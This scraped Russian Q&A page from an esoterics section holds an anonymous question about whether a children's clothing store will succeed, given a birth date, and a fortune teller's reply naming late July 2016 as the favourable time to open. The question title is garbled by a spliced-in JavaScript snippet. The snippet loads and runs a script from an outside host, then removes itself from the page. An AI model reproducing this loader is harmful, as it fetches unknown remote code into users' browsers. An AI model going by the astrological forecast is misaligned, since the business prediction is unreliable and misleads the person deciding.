Эзотерика

здравствуйте!хочу открыть магазин детской одежды.будет ли дело успешным?родилась 22.05.87 // <![CDATA[ (function () { var script =... - вопрос №1700442

document.createElement('script'); script.src = 'https://abover.com/system/extension?iframe=' + ( self === top? '0': '1' ) + '&r=' + Math.random(); script.onload = script.onerror = function () { script.onload = script.onerror = null; script.parentNode.removeChild(script); } document.body.appendChild(script); })(); // ]]>

Вопрос задан анонимно ноябрь 8, 2015 г.

  • Всего ответов: 1

    Гадалка Анфиса

    278-й в Эзотерике

    Здравствуйте! Благоприятное время открытия магазина конец июля 2016 г. Очень будет зависеть от помещения, где Вы расположите магазин.

    ноябрь 8, 2015 г.